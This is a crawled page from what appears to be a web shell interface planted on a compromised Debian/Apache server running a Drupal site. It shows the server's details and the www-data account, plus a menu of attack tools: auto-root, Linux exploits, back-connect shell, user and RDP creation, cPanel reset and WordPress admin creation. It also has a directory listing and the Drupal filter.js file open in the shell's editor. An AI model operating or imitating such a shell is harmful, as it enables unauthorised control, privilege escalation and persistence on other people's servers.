Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.28.90
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
filter /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
filter.admin.inc
14.42
KB
-rw-r--r--
filter.admin.js
1.54
KB
-rw-r--r--
filter.api.php
11.54
KB
-rw-r--r--
filter.css
923
B
-rw-r--r--
filter.info
323
B
-rw-r--r--
filter.install
15.44
KB
-rw-r--r--
filter.js
556
B
-rw-r--r--
filter.module
66.07
KB
-rw-r--r--
filter.pages.inc
2.37
KB
-rw-r--r--
filter.test
86.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter.js
(function ($) { /** * Automatically display the guidelines of the selected text format. */ Drupal.behaviors.filterGuidelines = { attach: function (context) { $('.filter-guidelines', context).once('filter-guidelines') .find(':header').hide() .closest('.filter-wrapper').find('select.filter-list') .bind('change', function () { $(this).closest('.filter-wrapper') .find('.filter-guidelines-item').hide() .siblings('.filter-guidelines-' + this.value).show(); }) .change(); } }; })(jQuery);
Close